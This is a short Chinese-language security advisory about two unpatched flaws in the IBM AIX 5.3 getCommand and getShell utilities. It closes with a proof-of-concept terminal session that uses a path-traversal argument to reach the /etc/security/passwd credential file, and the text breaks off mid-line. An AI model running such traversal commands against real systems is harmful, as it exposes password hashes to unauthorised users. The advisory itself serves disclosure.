http://www.ers.ibm.com/<...">
IBM AIX是一款商业性质的UNIX操作系统。
在应用了最新补丁之后,AIX的getCommand和getShell命令中仍存在两个漏洞。攻击者可以通过特制命令判断是否存在某文件,或读取其没有权限的任意shell文档。
IBM AIX 5.3 ml03
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://www.ers.ibm.com/” target=“_blank”>http://www.ers.ibm.com/</a>
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
-bash-3.00$ ls -ld /etc/security/
drwxr-x--- 4 root s